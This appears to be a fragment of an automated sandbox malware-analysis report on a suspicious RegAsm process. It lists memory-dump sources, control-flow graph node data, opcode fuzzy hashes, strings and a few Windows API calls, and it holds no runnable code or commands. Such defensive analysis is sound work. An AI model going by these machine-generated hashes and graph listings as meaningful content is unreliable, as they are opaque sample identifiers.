                                                                            • Instruction Fuzzy Hash: 87D1E5B4A00318CFDB14EFB5D854A9DBBB2FF8A305F108269D40AAB654DB395986CF11
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 580e902508961fec91893526817031ef6c2c8bbe67a25bdbbca9052d09dee31b
                                                                            • Instruction ID: 21790fda11f533cda0bd45e472591e5b3078080a0c12838eca0fb3777adffafd
                                                                            • Opcode Fuzzy Hash: 580e902508961fec91893526817031ef6c2c8bbe67a25bdbbca9052d09dee31b
                                                                            • Instruction Fuzzy Hash: 85D19E74E01218CFDB64DFA9D984B9DBBB2BF89300F1091AAD409AB355DB309985CF50
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c4cfad40fed586e123e6a7c40c87cdab37dd1a0eb6c129021b9d7464eb74feff
                                                                            • Instruction ID: a84a3408dd85e82a044d27c04328652dc29e473c757afbf6c36f2fd9fd30003e
                                                                            • Opcode Fuzzy Hash: c4cfad40fed586e123e6a7c40c87cdab37dd1a0eb6c129021b9d7464eb74feff
                                                                            • Instruction Fuzzy Hash: 9CC1C374E00219CFDB14CFAAD984A9DBBB6FF88300F10D1A9D819AB255DB349D86CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c2ec4ce2165eedae844234124d6141b6af6c08a7a712361abceb518d675292d
                                                                            • Instruction ID: ff19a983504911b5e5a22ae8956f4c5c78373ac52bc2fa74e5b74d6437f33002
                                                                            • Opcode Fuzzy Hash: 6c2ec4ce2165eedae844234124d6141b6af6c08a7a712361abceb518d675292d
                                                                            • Instruction Fuzzy Hash: 4EC1D070D01229CFDB68DF65C950BDEBBB2BF89304F1091AAC409BB295DB355A85CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 842e2f5ade4572255906b2e391114596331b7583ee56cb7228d2a78001dc8945
                                                                            • Instruction ID: 569a465d2f015d197f22a151abfb30cf62d23ede719309ab5f1e036943326081
                                                                            • Opcode Fuzzy Hash: 842e2f5ade4572255906b2e391114596331b7583ee56cb7228d2a78001dc8945
                                                                            • Instruction Fuzzy Hash: 74B15A70E043198FDF50DFB9E88579DBBF2AF88318F149529D818A7294EB749885CBC1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 59728c9c9d35961ce9aa9516ce570cbc4d10554b4ee3fdfad48a628f081e4759
                                                                            • Instruction ID: 6eac9cb2209a52147912d2825e364dfc5fa27895443562db15506ca5d74b5df3
                                                                            • Opcode Fuzzy Hash: 59728c9c9d35961ce9aa9516ce570cbc4d10554b4ee3fdfad48a628f081e4759
                                                                            • Instruction Fuzzy Hash: 7DA1C370E01229CFDB24DFA5D850B9EBBB2FF88304F2081AAD5096B295DB355E85CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8a97dcc03011d2db18b5a3a857b6520891455d65e3fcab07a27a39bf460bed2d
                                                                            • Instruction ID: 3065fbece5774798b7636b236847874bf8408cd09dc01c5460a50a0fc53d48b9
                                                                            • Opcode Fuzzy Hash: 8a97dcc03011d2db18b5a3a857b6520891455d65e3fcab07a27a39bf460bed2d
                                                                            • Instruction Fuzzy Hash: 7D51C775E00219CBEB18CFAAD94479DFBB7BF88304F14C0A9881DA7269DB345946CF50

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 294 6b60d80-6b60dcb 299 6b60dd1-6b60dd3 294->299 300 6b60efd-6b60f10 294->300 301 6b60dd6-6b60de5 299->301 304 6b61006-6b61011 300->304 305 6b60f16-6b60f25 300->305 306 6b60e9d-6b60ea1 301->306 307 6b60deb-6b60e1d 301->307 308 6b61019-6b61022 304->308 312 6b60fd1-6b60fd5 305->312 313 6b60f2b-6b60f51 305->313 309 6b60ea3-6b60eae 306->309 310 6b60eb0 306->310 342 6b60e26-6b60e2d 307->342 343 6b60e1f-6b60e24 307->343 314 6b60eb5-6b60eb8 309->314 310->314 316 6b60fd7-6b60fe2 312->316 317 6b60fe4 312->317 344 6b60f53-6b60f58 313->344 345 6b60f5a-6b60f61 313->345 314->308 319 6b60ebe-6b60ec2 314->319 320 6b60fe6-6b60fe8 316->320 317->320 321 6b60ec4-6b60ecf 319->321 322 6b60ed1 319->322 325 6b60fea-6b60ff4 320->325 326 6b61039-6b610b5 320->326 327 6b60ed3-6b60ed5 321->327 322->327 336 6b60ff7-6b61000 325->336 376 6b610bb-6b610bd 326->376 377 6b61189-6b6119c 326->377 332 6b61025-6b61032 327->332 333 6b60edb-6b60ee5 327->333 332->326 346 6b60ee8-6b60ef2 333->346 336->304 336->305 348 6b60e52-6b60e76 342->348 349 6b60e2f-6b60e50 342->349 347 6b60e91-6b60e9b 343->347 350 6b60fc5-6b60fcf 344->350 351 6b60f86-6b60faa 345->351 352 6b60f63-6b60f84 345->352 346->301 353 6b60ef8 346->353 347->346 366 6b60e8e 348->366 367 6b60e78-6b60e7e 348->367 349->347 350->336 368 6b60fc2 351->368 369 6b60fac-6b60fb2 351->369 352->350 353->308 366->347 371 6b60e82-6b60e84 367->371 372 6b60e80 367->372 368->350 373 6b60fb6-6b60fb8 369->373 374 6b60fb4 369->374 371->366 372->366 373->368 374->368 378 6b610c0-6b610cf 376->378 381 6b61234-6b6123f 377->381 382 6b611a2-6b611b1 377->382 383 6b610d1-6b610dd 378->383 384 6b61129-6b6112d 378->384 386 6b61247-6b61250 381->386 390 6b611b3-6b611dc 382->390 391 6b611ff-6b61203 382->391 397 6b610e7-6b610fe 383->397 387 6b6112f-6b6113a 384->387 388 6b6113c 384->388 389 6b61141-6b61144 387->389 388->389 389->386 393 6b6114a-6b6114e 389->393 415 6b611f4-6b611fd 390->415 416 6b611de-6b611e4 390->416 395 6b61205-6b61210 391->395 396 6b61212 391->396 398 6b61150-6b6115b 393->398 399 6b6115d 393->399 400 6b61214-6b61216 395->400 396->400 406 6b61104-6b61106 397->406 405 6b6115f-6b61161 398->405 399->405 403 6b61267-6b61294 400->403 404 6b61218-6b61222 400->404 428 6b61296 403->428 429 6b612c4-6b612c6 403->429 419 6b61225-6b6122e 404->419 409 6b61167-6b61171 405->409 410 6b61253-6b61260 405->410 412 6b6111e-6b61127 406->412 413 6b61108-6b6110e 406->413 426 6b61174-6b6117e 409->426 410->403 412->426 417 6b61112-6b61114 413->417 418 6b61110 413->418 415->419 420 6b611e6 416->420 421 6b611e8-6b611ea 416->421 417->412 418->412 419->381 419->382 420->415 421->415 426->378 430 6b61184 426->430 431 6b6129e-6b612af 428->431 432 6b61298-6b6129d 428->432 433 6b612c7-6b612e9 429->433 430->386 431->433 436 6b612b1-6b612b7 431->436 432->431 440 6b612ec-6b612f0 433->440 438 6b612bb-6b612bd 436->438 439 6b612b9 436->439 438->429 439->433 441 6b612f2-6b612f7 440->441 442 6b612f9-6b612fe 440->442 443 6b61304-6b61307 441->443 442->443 444 6b6130d-6b61322 443->444 445 6b614f8-6b61500 443->445 444->440 447 6b61324 444->447 448 6b613e0-6b61405 447->448 449 6b6132b-6b61350 447->449 450 6b61498 447->450 460 6b61407-6b61409 448->460 461 6b6140b-6b6140f 448->461 462 6b61356-6b6135a 449->462 463 6b61352-6b61354 449->463 451 6b614a2-6b614b9 450->451 455 6b614bf-6b614f3 451->455 455->440 464 6b6146d-6b61493 460->464 465 6b61430-6b61453 461->465 466 6b61411-6b6142e 461->466 468 6b6135c-6b61379 462->468 469 6b6137b-6b6139e 462->469 467 6b613b8-6b613db 463->467 464->440 484 6b61455-6b6145b 465->484 485 6b6146b 465->485 466->464 467->440 468->467 486 6b613b6 469->486 487 6b613a0-6b613a6 469->487 490 6b6145f-6b61461 484->490 491 6b6145d 484->491 485->464 486->467 488 6b613aa-6b613ac 487->488 489 6b613a8 487->489 488->486 489->486 490->485 491->485
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-2551331179
                                                                            • Opcode ID: 15ff2d40f31f19bad7bfdf2e7a1ed0eb8ee9b8b324164ae9389a3b9bfe466a41
                                                                            • Instruction ID: 3ae85c3d276e27665d0b56d0011ae7e91180343bb1de34bc41fd19572d1e44fa
                                                                            • Opcode Fuzzy Hash: 15ff2d40f31f19bad7bfdf2e7a1ed0eb8ee9b8b324164ae9389a3b9bfe466a41
                                                                            • Instruction Fuzzy Hash: 4332B470B002459FDB95DB6EC95496EBBF6FF89700B1094A9E906CB3A1CB78DC01CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 492 6b61584 493 6b6158e 492->493 494 6b61598-6b615af 493->494 495 6b615b5-6b615b7 494->495 496 6b615cf-6b615f1 495->496 497 6b615b9-6b615bf 495->497 502 6b61638-6b6163f 496->502 498 6b615c3-6b615c5 497->498 499 6b615c1 497->499 498->496 499->496 503 6b61645-6b61747 502->503 504 6b61571-6b61580 502->504 507 6b61582 504->507 508 6b615f3-6b615f7 504->508 507->492 509 6b61606 508->509 510 6b615f9-6b61604 508->510 512 6b6160b-6b6160e 509->512 510->512 512->503 514 6b61610-6b61614 512->514 516 6b61616-6b61621 514->516 517 6b61623 514->517 518 6b61625-6b61627 516->518 517->518 520 6b6162d-6b61637 518->520 521 6b6174a-6b6178e 518->521 520->502 527 6b61796-6b617a7 521->527 528 6b61790-6b61795 521->528 530 6b617bf-6b617e1 527->530 531 6b617a9-6b617af 527->531 528->527 536 6b617e4-6b617e8 530->536 532 6b617b3-6b617b5 531->532 533 6b617b1 531->533 532->530 533->530 537 6b617f1-6b617f6 536->537 538 6b617ea-6b617ef 536->538 539 6b617fc-6b617ff 537->539 538->539 540 6b61805-6b6181a 539->540 541 6b61abf-6b61ac7 539->541 540->536 543 6b6181c 540->543 544 6b61a07-6b61a2c 543->544 545 6b61823-6b618d3 543->545 546 6b61990-6b619bd 543->546 547 6b618d8-6b6198b 543->547 560 6b61a32-6b61a36 544->560 561 6b61a2e-6b61a30 544->561 545->536 566 6b61b36-6b61b77 546->566 567 6b619c3-6b619cd 546->567 547->536 568 6b61a57-6b61a7a 560->568 569 6b61a38-6b61a55 560->569 565 6b61a94-6b61aba 561->565 565->536 572 6b619d3-6b61a02 567->572 573 6b61b00-6b61b2f 567->573 590 6b61a92 568->590 591 6b61a7c-6b61a82 568->591 569->565 572->536 573->566 590->565 593 6b61a86-6b61a88 591->593 594 6b61a84 591->594 593->590 594->590
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-3723351465
                                                                            • Opcode ID: ac057f65598ffe353bb4651bcd9866af2618928210d42a83ff9d5b6a839c0df7
                                                                            • Instruction ID: 05f3a95b7f810baf9dce87f4aeb2a96aeb0e214ff8e9ffeb107de4699dbf4c7e
                                                                            • Opcode Fuzzy Hash: ac057f65598ffe353bb4651bcd9866af2618928210d42a83ff9d5b6a839c0df7
                                                                            • Instruction Fuzzy Hash: E0C1D374B002158FDB54CB6EC894A3A7BE7EF85704F1098AAE5028B3A1DF78DC05CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 822 6b83f50-6b83f84 825 6b83f92-6b83fa5 822->825 826 6b83f86-6b83f8f 822->826 827 6b83fab-6b83fae 825->827 828 6b84215-6b84219 825->828 826->825 830 6b83fbd-6b83fc9 827->830 831 6b83fb0-6b83fb5 827->831 832 6b8421b-6b8422b 828->832 833 6b8422e-6b84238 828->833 834 6b83fcf-6b83fe1 830->834 835 6b84253-6b84299 830->835 831->830 832->833 839 6b8414d-6b8415b 834->839 840 6b83fe7-6b8403a 834->840 842 6b842a8-6b842d0 835->842 843 6b8429b-6b842a5 835->843 847 6b841e0-6b841e2 839->847 848 6b84161-6b8416f 839->848 871 6b8404a 840->871 872 6b8403c-6b84048 call 6b83c88 840->872 864 6b84425-6b84443 842->864 865 6b842d6-6b842ef 842->865 843->842 852 6b841f0-6b841fc 847->852 853 6b841e4-6b841ea 847->853 850 6b8417e-6b8418a 848->850 851 6b84171-6b84176 848->851 850->835 858 6b84190-6b841bf 850->858 851->850 863 6b841fe-6b8420f 852->863 856 6b841ec 853->856 857 6b841ee 853->857 856->852 857->852 874 6b841d0-6b841de 858->874 875 6b841c1-6b841ce 858->875 863->827 863->828 881 6b844ae-6b844b8 864->881 882 6b84445-6b84467 864->882 883 6b842f5-6b8430b 865->883 884 6b84406-6b8441f 865->884 878 6b8404c-6b8405c 871->878 872->878 874->828 875->874 889 6b8405e-6b84075 878->889 890 6b84077-6b84079 878->890 902 6b844b9-6b8450a 882->902 903 6b84469-6b84485 882->903 883->884 901 6b84311-6b8435f 883->901 884->864 884->865 889->890 893 6b8407b-6b84089 890->893 894 6b840c2-6b840c4 890->894 893->894 905 6b8408b-6b8409d 893->905 897 6b840d2-6b840e2 894->897 898 6b840c6-6b840d0 894->898 909 6b8410d-6b84113 call 6b848a8 897->909 910 6b840e4-6b840f2 897->910 898->897 914 6b8411b-6b84127 898->914 950 6b84389-6b843ad 901->950 951 6b84361-6b84387 901->951 940 6b8452a-6b84568 902->940 941 6b8450c-6b84528 902->941 916 6b844a9-6b844ac 903->916 918 6b8409f-6b840a1 905->918 919 6b840a3-6b840a7 905->919 922 6b84119 909->922 925 6b840f4-6b84103 910->925 926 6b84105-6b84108 910->926 914->863 928 6b8412d-6b84148 914->928 916->881 924 6b84493-6b84496 916->924 927 6b840ad-6b840bc 918->927 919->927 922->914 924->902 929 6b84498-6b844a8 924->929 925->914 926->828 927->894 937 6b84239-6b8424c 927->937 928->828 929->916 937->835 941->940 960 6b843df-6b843f8 950->960 961 6b843af-6b843c6 950->961 951->950 963 6b843fa 960->963 964 6b84403 960->964 967 6b843c8-6b843cb 961->967 968 6b843d2-6b843dd 961->968 963->964 964->884 967->968 968->960 968->961
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$k #m^
                                                                            • API String ID: 0-2108030852
                                                                            • Opcode ID: d0533858124b37eb30ab1c935fc9ba7c739f05120a9c7dfb725f26d351f0f92e
                                                                            • Instruction ID: 959e24423c2a7b1f49dc44ae689e0778362dfdbfdd870a187a112e5afb1e517b
                                                                            • Opcode Fuzzy Hash: d0533858124b37eb30ab1c935fc9ba7c739f05120a9c7dfb725f26d351f0f92e
                                                                            • Instruction Fuzzy Hash: 95E13F74F002168FCB54EF69C594AAEBBF6FF88600B1591A9D906EB365DB34DC01CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1165 6b88c88-6b88c94 1166 6b88d00-6b88d11 1165->1166 1167 6b88c96-6b88c9a 1165->1167 1174 6b88d1a-6b88d25 1166->1174 1168 6b88d2c 1167->1168 1169 6b88ca0-6b88ca7 1167->1169 1170 6b88d2f-6b88d30 1168->1170 1172 6b88d58-6b88dad 1169->1172 1173 6b88cad-6b88cef 1169->1173 1170->1174 1175 6b88d31-6b88d51 1170->1175 1172->1170 1191 6b88daf-6b88dd4 1172->1191 1189 6b88cf7-6b88cfd 1173->1189 1174->1168 1175->1172 1193 6b88ddc-6b88e46 1191->1193 1194 6b88dd6-6b88dd9 1191->1194 1201 6b88e48 1193->1201 1202 6b88e4d-6b88e5b 1193->1202 1201->1202
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (aq$(aq
                                                                            • API String ID: 0-3916115647
                                                                            • Opcode ID: 5ef4cb9c97e835863c099f7c2cc8fff82fba7621c10061877b952a757d76b52e
                                                                            • Instruction ID: 76dbcc087efcaa2bded2e0347b194c19611ea8dee52556f764117503b92cb787
                                                                            • Opcode Fuzzy Hash: 5ef4cb9c97e835863c099f7c2cc8fff82fba7621c10061877b952a757d76b52e
                                                                            • Instruction Fuzzy Hash: 6341F67070429A5FCB499E7994107BF7FA6AFD5650F1484AAE809DB395DE34CC02C3E2

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1204 6b61291-6b61294 1205 6b61296 1204->1205 1206 6b612c4-6b612c6 1204->1206 1207 6b6129e-6b612af 1205->1207 1208 6b61298-6b6129d 1205->1208 1209 6b612c7-6b612e9 1206->1209 1207->1209 1212 6b612b1-6b612b7 1207->1212 1208->1207 1216 6b612ec-6b612f0 1209->1216 1214 6b612bb-6b612bd 1212->1214 1215 6b612b9 1212->1215 1214->1206 1215->1209 1217 6b612f2-6b612f7 1216->1217 1218 6b612f9-6b612fe 1216->1218 1219 6b61304-6b61307 1217->1219 1218->1219 1220 6b6130d-6b61322 1219->1220 1221 6b614f8-6b61500 1219->1221 1220->1216 1223 6b61324 1220->1223 1224 6b613e0-6b61405 1223->1224 1225 6b6132b-6b61350 1223->1225 1226 6b61498-6b614b9 1223->1226 1236 6b61407-6b61409 1224->1236 1237 6b6140b-6b6140f 1224->1237 1238 6b61356-6b6135a 1225->1238 1239 6b61352-6b61354 1225->1239 1231 6b614bf-6b614f3 1226->1231 1231->1216 1240 6b6146d-6b61493 1236->1240 1241 6b61430-6b61453 1237->1241 1242 6b61411-6b6142e 1237->1242 1244 6b6135c-6b61379 1238->1244 1245 6b6137b-6b6139e 1238->1245 1243 6b613b8-6b613db 1239->1243 1240->1216 1260 6b61455-6b6145b 1241->1260 1261 6b6146b 1241->1261 1242->1240 1243->1216 1244->1243 1262 6b613b6 1245->1262 1263 6b613a0-6b613a6 1245->1263 1266 6b6145f-6b61461 1260->1266 1267 6b6145d 1260->1267 1261->1240 1262->1243 1264 6b613aa-6b613ac 1263->1264 1265 6b613a8 1263->1265 1264->1262 1265->1262 1266->1261 1267->1261
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q
                                                                            • API String ID: 0-127220927
                                                                            • Opcode ID: ec13f305dd0a02290867eac4777554d7e58662918b9a51174707a07885720207
                                                                            • Instruction ID: 6d22441b6dde3891eb2c0ee419dac911ee10c7a2773c988c4ce7dab7580ef604
                                                                            • Opcode Fuzzy Hash: ec13f305dd0a02290867eac4777554d7e58662918b9a51174707a07885720207
                                                                            • Instruction Fuzzy Hash: 3F41E8B47402019FDB949AAEC850A7A769BEF99B04F109469FE02CB3D1CEB9CC01C791
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: + #m^
                                                                            • API String ID: 0-1058273229
                                                                            • Opcode ID: a089c0248aa24f104844aa57d571fed71eed975bef6880e402c6650131efd9ae
                                                                            • Instruction ID: de0cb62e3dad1caeb84ff9eececd76c4581894007b94ceec35bfd68d66999ce2
                                                                            • Opcode Fuzzy Hash: a089c0248aa24f104844aa57d571fed71eed975bef6880e402c6650131efd9ae
                                                                            • Instruction Fuzzy Hash: 28123774B006068FCB54EF29D588A6ABBF6FF89305B1584A9E506CB372DB34EC45CB50
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 015AB086
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 2ec7364baf017bbb51ee400133b3322c1c68f620a5a933e979c555ef2fcc6b41
                                                                            • Instruction ID: 3dd0803bb132ef471d9f3aa611cc2092a4cc765dff1d25f92e6ba94207db5ddd
                                                                            • Opcode Fuzzy Hash: 2ec7364baf017bbb51ee400133b3322c1c68f620a5a933e979c555ef2fcc6b41
                                                                            • Instruction Fuzzy Hash: B57155B0A00B468FD728CF29D54075EBBF5FF88204F00892ED55ADBA50DB39E949CB90
                                                                            APIs
                                                                            • KiUserExceptionDispatcher.NTDLL ref: 06E44158
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: DispatcherExceptionUser
                                                                            • String ID:
                                                                            • API String ID: 6842923-0
                                                                            • Opcode ID: a64c19ea48a2b34954f060d0a9e958dd9015e151bd25971ef5361f516cf5bb8b
                                                                            • Instruction ID: 5d5b68b2ce8418a0d6364c08ff9ba216fdbe3a87bea052845586ca857092147c
                                                                            • Opcode Fuzzy Hash: a64c19ea48a2b34954f060d0a9e958dd9015e151bd25971ef5361f516cf5bb8b
                                                                            • Instruction Fuzzy Hash: AB51E374E01209CFDB08DFA9E5446EDBBF2FB88304F20902AD406AB364EB345916CF90
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 015A59F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: ca5ee1d054bdea21962b80ff3f221f43ce58911b199ab40817c3c6a058c470ba
                                                                            • Instruction ID: 0e560a8555d4ba9421d171b642b0287e844ea9d65325911d5a7cb8c8bc3131e0
                                                                            • Opcode Fuzzy Hash: ca5ee1d054bdea21962b80ff3f221f43ce58911b199ab40817c3c6a058c470ba
                                                                            • Instruction Fuzzy Hash: 0241D2B0D00719CEDB24CFA9C994B9DBBB5FF49304F20845AD408AB254DBB56949CF91
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05874381
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: 1a4063d707bf1a12b0f7a3dab85adce7a41661881adf97a9f7dc451e2d002b82
                                                                            • Instruction ID: b9051170930c26f07207a23fbe5544466d0d9920eee28cd7ae8910ab2c98245c
                                                                            • Opcode Fuzzy Hash: 1a4063d707bf1a12b0f7a3dab85adce7a41661881adf97a9f7dc451e2d002b82
                                                                            • Instruction Fuzzy Hash: D341F6B59003098FCB14CF99C488EAABBF5FF88314F248559E519AB321D774A845CBA0
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 015A59F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 4e9e03dca0e9d85de669956559752e0e9462e95032a01d85f0de883e4ac09309
                                                                            • Instruction ID: 4ab82fae6ce4b50ba1783ebd6e057d0bab51bf8a7c785218dec75f7fa626f2e9
                                                                            • Opcode Fuzzy Hash: 4e9e03dca0e9d85de669956559752e0e9462e95032a01d85f0de883e4ac09309
                                                                            • Instruction Fuzzy Hash: 4641FFB0D00719CEDB24CFA9C884B9DBBF5FF49304F60846AD408AB250DBB5694ACF91
                                                                            APIs
                                                                            • KiUserExceptionDispatcher.NTDLL ref: 06E44158
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: DispatcherExceptionUser
                                                                            • String ID:
                                                                            • API String ID: 6842923-0
                                                                            • Opcode ID: 39605de3dbdc5ff62282f81d3db894e0d87d1179a1efc039958ec445eb9ccff1
                                                                            • Instruction ID: 0b7dbf4adc868b3bcae346ba47a7753f0ca7ad0c8df11fd2a1ad69ca841160e6
                                                                            • Opcode Fuzzy Hash: 39605de3dbdc5ff62282f81d3db894e0d87d1179a1efc039958ec445eb9ccff1
                                                                            • Instruction Fuzzy Hash: A831B274E01209CFCB04DFA8E594A9DBBB2FF48304F20906AD51AAB354DB345D51CF91
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015AD2C6,?,?,?,?,?), ref: 015AD387
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: bfee9f911f84cb4142891a3042a1d11168ef60cc39150e0714337eda001b70f2
                                                                            • Instruction ID: f1f3e831103b808f14131d5be8c81e84b4a9aa87ed105c3fb928d4ae5eed0a2b
                                                                            • Opcode Fuzzy Hash: bfee9f911f84cb4142891a3042a1d11168ef60cc39150e0714337eda001b70f2
                                                                            • Instruction Fuzzy Hash: 8121B3B59002489FDB10DF9AD984AEEBFF4FB48310F14841AE919A7310D378A954CFA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
